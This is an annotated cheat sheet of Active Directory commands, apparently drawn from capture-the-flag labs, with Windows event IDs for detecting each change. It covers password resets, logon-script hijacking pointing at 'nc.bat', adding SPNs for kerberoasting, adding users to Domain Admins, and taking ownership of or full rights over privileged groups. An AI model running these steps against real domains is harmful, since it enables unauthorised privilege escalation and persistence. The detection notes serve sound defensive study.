👩‍✈️ Active Directory Commands

Common Active Directory object changes, each shown with several different tools.

setadpassword

# MS AD Module
# Administrative reset of the password on account "smith": -Reset replaces the
# password without supplying the current one, so the caller needs the
# reset-password right on that account.
# The new password is a plain-text literal, so it is recorded wherever the
# command line is (PSReadLine history, transcripts, script block logging).
# Detection: the DC logs Security event 4724 (password reset attempt) when
# user-account-management auditing is enabled.
Set-ADAccountPassword -Identity smith -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force)

setadattribute

# MS AD Module
# Three independent attribute writes on user objects; each needs write access
# to the attribute being changed.
# 1) Logon script (scriptPath) of maria. The file named there is run at the
#    user's logon, so unexpected writes to this attribute deserve an alert.
#    NOTE(review): PowerShell does not treat "\" as an escape character, so
#    the doubled backslashes are stored in the attribute exactly as written.
Set-ADUser maria -scriptpath "C:\\programdata\\pc.bat"
# 2) Overwrite extensionAttribute1 on ShriyaB; -replace discards any value
#    already present.
Set-ADUser ShriyaB -replace @{'extensionAttribute1' = 'demo text'}
# 3) Add a service principal name to maria. An SPN on a user account lets any
#    authenticated principal request a service ticket encrypted with that
#    account's key, so such accounts need long random passwords and SPN
#    additions to user accounts are worth monitoring.
# Detection: Security event 5136 records each attribute write when "Audit
# Directory Service Changes" and a matching SACL are in place; a script-path
# change also shows up in event 4738 (user account changed).
Set-ADUser -Identity maria -ServicePrincipalNames @{Add='MSSQLSvc/object.local:1433'}

# MS setspn.exe
# Registers the SPN MSSQLSvc/object.local:1433 on the account object.local\maria
# with the built-in Windows tool (same directory change as writing
# servicePrincipalName directly).
# NOTE(review): setspn also offers -s, which checks for a duplicate SPN before
# adding; duplicates break Kerberos authentication to the service.
setspn -a MSSQLSvc/object.local:1433 object.local\maria

# Powerview.ps1 Module
# Writes the scriptPath attribute of maria through PowerView instead of the
# Microsoft AD module; the directory change and the audit trail (event 5136 /
# 4738, when auditing is configured) are the same regardless of the tool.
# NOTE(review): as in any PowerShell string, the doubled backslashes are kept
# literally in the stored value.
Set-DomainObject -Identity maria -SET @{scriptpath = "C:\\programdata\\nc.bat"}

AddAdGroupMember

# MS AD Module
# Adds maria to the 'Domain Admins' group; the caller needs write access to the
# group's member attribute.
# Detection: Security event 4728 (member added to a security-enabled global
# group) on the DC. Any membership change to this group should raise an alert.
Add-ADGroupMember -Identity 'Domain Admins' -Members maria

# Powerview.ps1
# Same membership change made through PowerView: maria becomes a member of
# 'Domain Admins'. The DC-side audit record (event 4728, when account
# management auditing is on) does not depend on which tool made the change.
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'

# apt install samba
# NOTE(review): "group members" only lists the current members of the
# "Network Audit" group; it changes nothing. Under this heading it serves as a
# verification step, not as an addition.
# Authenticates as m.lovegod against dc.absolute.htb; --use-kerberos=required
# forbids falling back to NTLM, so a valid Kerberos ticket or working KDC
# access is needed.
net rpc group members "Network Audit" -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb

SetAdObjectOwner

# MS AD Module
# Account that will become the new owner of the object.
$user = new-object system.security.principal.ntaccount("htb.local\tom")
# For every group whose name matches "Backup Admins": read its security
# descriptor through the AD: drive of the ActiveDirectory module, set the owner
# to $user, and write the descriptor back.
# Why it matters: an object's owner can always rewrite that object's DACL, so
# an ownership change amounts to control over the object.
# Detection: with "Audit Directory Service Changes" and a SACL on the object,
# the write to nTSecurityDescriptor should appear as event 5136 (confirm in
# your environment).
Get-ADGroup -filter 'name -like "Backup Admins"' | foreach{$acl = Get-Acl -Path "AD:$($_.DistinguishedName)";$acl.SetOwner($user);Set-Acl -Path "AD:$($_.DistinguishedName)" $acl;}

# Powerview.ps1
# Makes maria the owner of the 'Domain Admins' group object via PowerView.
# The caller needs the right to change the owner on that object. The new owner
# can then modify the object's DACL, so owner changes on privileged groups
# should be audited and alerted on.
Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'

AddACLRights

# MS AD Module
# NOTE(review): $user is assigned here but never used below; the access rule
# is built from the string 'htb.local\Backup_Admins' instead.
$user = new-object system.security.principal.ntaccount("object\maria")
# Intent: for every group matching "Domain Admins", read its ACL through the
# AD: drive, append an access rule for Backup_Admins, and write the ACL back.
# NOTE(review): ActiveDirectoryAccessRule is defined in System.DirectoryServices,
# and its constructors take an IdentityReference, an ActiveDirectoryRights value
# and an AccessControlType. This call uses a different namespace and passes two
# strings, so confirm it runs as written before relying on it.
# Detection: a DACL change on a privileged group is a write to
# nTSecurityDescriptor (event 5136 when directory-service-change auditing and a
# SACL are configured).
Get-ADGroup -filter 'name -like "Domain Admins"' | foreach{$acl = Get-Acl -Path "AD:$($_.DistinguishedName)";$ace = New-Object Security.AccessControl.ActiveDirectoryAccessRule('htb.local\Backup_Admins','FullControl');$acl.AddAccessRule($ace);Set-Acl -Path "AD:$($_.DistinguishedName)" $acl;}

# Powerview.ps1
# Grants the principal claire all rights over the object "Backup_Admins".
# NOTE(review): target and trustee differ from the MS AD Module example in this
# section (which targets "Domain Admins" with Backup_Admins as trustee), so the
# two snippets are not equivalent.
# The caller needs permission to modify the target's DACL. Review ACEs on
# privileged groups regularly; unexpected full-control entries are a common
# persistence indicator.
Add-DomainObjectAcl -TargetIdentity "Backup_Admins" -PrincipalIdentity claire -Rights All
